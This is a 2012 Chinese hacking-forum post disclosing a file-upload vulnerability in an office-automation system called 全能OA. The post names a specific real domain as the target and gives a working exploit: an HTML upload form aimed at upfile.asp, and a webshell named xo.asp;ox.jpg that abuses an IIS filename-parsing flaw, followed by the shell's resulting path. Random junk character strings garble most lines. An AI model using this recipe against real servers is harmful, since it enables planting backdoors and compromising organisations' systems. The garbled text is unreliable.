找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2217|回复: 0
打印 上一主题 下一主题

全能OA办公系统0day OA办公系统漏洞 上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-21 13:45:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
全能OA办公系统 上传漏洞
3 X2 h" r" b+ u& _1 @" ]! E% L8 S1 j; C& d2 B
系统介绍:2 F' n$ V- b7 q' s) k

9 d: C) }- j1 n全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。: u! \8 m5 x0 b9 j8 L. L: H

: X; R0 _/ f0 x! S) q! h9 `) Y* v主要功能:0 m) e+ S' w- {" X, @
公司通告
$ O' R3 e8 ?# }, U: U9 l工作计划 ' h8 Y6 b( k/ {. f* J3 O# d
通讯助理
: \7 l, e0 f; i: x- a( B客户资源 - s% h5 I  ~  P1 ?; b1 x' u
我的公文 1 V4 C" p6 K5 O/ ^  [$ m
公文传阅 , J5 K1 V) ?4 x
公共资源 . P7 K- }3 l4 e
资源预约 * o, ]8 \8 V0 ?) ?. @
今日考勤
) f$ r+ P+ e; W; \1 I0 B' u个人计划
: ]" E, C! T! {个人通讯录 ; e% q  u9 V! k) @/ W
个人基本档案 * z8 f" [0 c$ A5 l& Y4 h7 Q+ W" }2 E
未读邮件 * D" u! N6 ]  m) @9 m4 B
发邮件 ; E9 f9 g2 h; K0 u0 l" v# ~
收件夹
2 C. f! K: F. G8 w6 X& \2 d' f寄件夹 + r5 f' h: v& t. m
网络硬盘 0 ~+ c$ v9 q. ]+ D% \, Y1 L
网络会议 ! f0 Z# v! y7 E3 `9 q# A
网络调查
6 _; _8 E, r2 G; z; Z* z& {交流论坛
) l& f4 T, U6 ?* j  h% I4 z  c- _3 t1 n; L
有兴趣测试的朋友可以下源码看看
, O: E0 j/ _+ A" r! a2 W  d$ o4 S) q! D' S
源码下载:
6 O9 [* j: t7 g) U7 l1 J( i7 {9 h. Z/ o+ ^+ g2 s3 G# d! N% e* H' `
http://www.mycodes.net/30/4750.htm! W, Q) d& k& l* R4 f! m% k0 p
; I- x' B' L) b  K& a
漏洞介绍:
" F% g: K# o1 s5 f$ I0 E
' C% S# E! c1 f- Z由upfile.asp上传文件漏洞引起
& M2 V2 D# v" M+ R- K8 t. b2 _+ b! }/ }7 ^
测试方法:
) @& R; _% S3 [$ V+ r
9 e$ Z! r) e% t/ ?# f- P4 d; O使用名小子上传http://www.itlynn.com/upfile.asp即可
8 n2 R! C# G, }+ p3 p$ E
- Q- I1 k8 L# D4 m% ~4 R  ]/ }如果upfile.asp文件被删除不存在。
) i- l, q, e- a' e% U+ ]5 c- N/ V4 F7 j% Q* U
  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp
$ N$ S* B! g5 B% K+ H9 u
! @: x- U8 Z; V& P7 @如果存在那么将如下代码保存为upfile.html。4 a$ J4 T6 M8 d- q

3 ]" k' W8 ~/ G" Y( M然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp
& |) @/ |5 U+ y9 F0 k/ L) {7 z
9 d/ h* ]$ C2 a* Z' K9 A+ ?$ e9 [
# U1 g, m( [- P. x8 X2 F3 l; n& p, ?. W: }; X5 e
01 <table border='0' align="center" cellpadding="5"> $ p* \, \3 B/ Z$ i6 D- f( k7 Q4 S; J

4 w5 A" ?$ `7 z, J- q1 I6 t" u02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> ; G" q5 U2 V, M3 i
: [8 {: T+ B0 w: j6 }; p; Z
03 <tr> + z( S" p% c2 V( I
/ C$ e3 q/ j7 i$ h0 d7 i
04             <td>报错:</td> 5 q) r0 g6 s+ l: K5 N9 I

4 \5 k& _0 \, F9 o" W; j4 C1 @05             <td><input type='radio' name='errnumber' value='0'> ( T+ W( N- R# f( O

; M: ~0 n, R1 o0 z" h; u06               自动更名
) k# ]& n  [/ k3 [  H( G6 x7 [3 c0 j  O# J7 B5 a* Q9 j
07               <input type='radio' name='errnumber' value='1' checked>
, N& s* z% i/ f) |2 z& e4 h, s4 S3 P8 T& E
08               报错方式 ( K/ I, h% e4 e* u$ d  [! G

8 z/ u8 h4 ]1 t: H3 E# O9 `" X% y09               <input type='radio' name='errnumber' value='2'> : b3 E1 d2 ^5 i) x1 x9 Y2 V
4 ]  `3 B; p+ N& K+ }( ~
10               直接覆盖</td> 3 W) z; W2 @9 B; Q7 U$ o! N
( Y1 z7 q  D2 P
11           </tr> ; r- r& Z7 ?# \6 w' M

5 O8 _- W- J$ x# @- i12           <tr>   b8 G6 T: u  t) J) o
4 |1 M- l+ e# ]* }/ M% ^0 v2 @
13             <td>主题:</td>
  G5 v5 E% I7 l8 N2 O5 c* H; a) H1 _# R$ R
14             <td><input type='text' name='filename' size='30'></td> / |& G, Z# o# h1 T
5 @* F! e" X' s  d  O: M9 i
15           </tr> : n2 S, I7 Y% y
8 u1 N* M7 H0 R; D% u7 S& V
16           <tr>
3 U1 y6 j& g) _/ ^
1 s; b6 O' n7 Z17             <td>文件:</td>
2 @1 H: k7 {' d4 j1 b- e( @# y, P% @2 O
18             <td><input type="file"name="fruit"size="30"></td> 2 }& p/ H! q+ E4 A. W& b, Z

- D& q8 J. N" r9 ?2 c19           </tr> ! ^1 U8 Q; X4 ^2 T! i& O
1 N* x' H" ~$ R$ [! ]8 r& ]* n* r
20           <tr>
+ v1 L/ y. X- u6 c
  Q6 e5 c  K" j6 ?2 F% ~' D% P21             <td valign='top'>简介:</td>
1 T, v7 w; t5 N
( @+ p# W/ N8 U, w22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
) o6 [& O) e, X! X
( ?7 F+ o! W  f1 x/ [* a23           </tr>
2 ?+ e/ J9 l! ~1 K6 [1 W
' |9 R, G: O6 Y1 t+ ^24   
! u0 {: V4 e8 [7 r8 l- U/ g: n
6 g6 S0 f! o# G2 }4 Y6 [3 Y1 P6 M25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> ( m* Y, r8 I3 O6 O# W* [* o/ |) t
( _2 U- R, S1 g
26           </tr> 4 D4 B6 D1 v1 [- O/ E- {

# Y1 q2 k& P3 _) ?8 b3 Y& s27         </form>
9 j& t( H/ V+ N0 c" e1 o4 ?" X, m- ]) M  a; }
然后打开上传一个文件名为xo.asp;ox.jpg的文件。
; |. @  ]% \3 v
+ O" [; T/ ^1 P* A# N0 ~ & `, Z1 o8 }+ I# L1 X% Z

/ n7 Y1 G, {. a) Q" i. c- U上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg. G& C5 I8 K3 y) S
; I! f6 r+ V& K7 i6 P4 A
此漏洞需要配合解析漏洞利用。/ E7 K7 s' t; x% o* A

! }2 {% x4 B2 W9 j0 k5 B
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表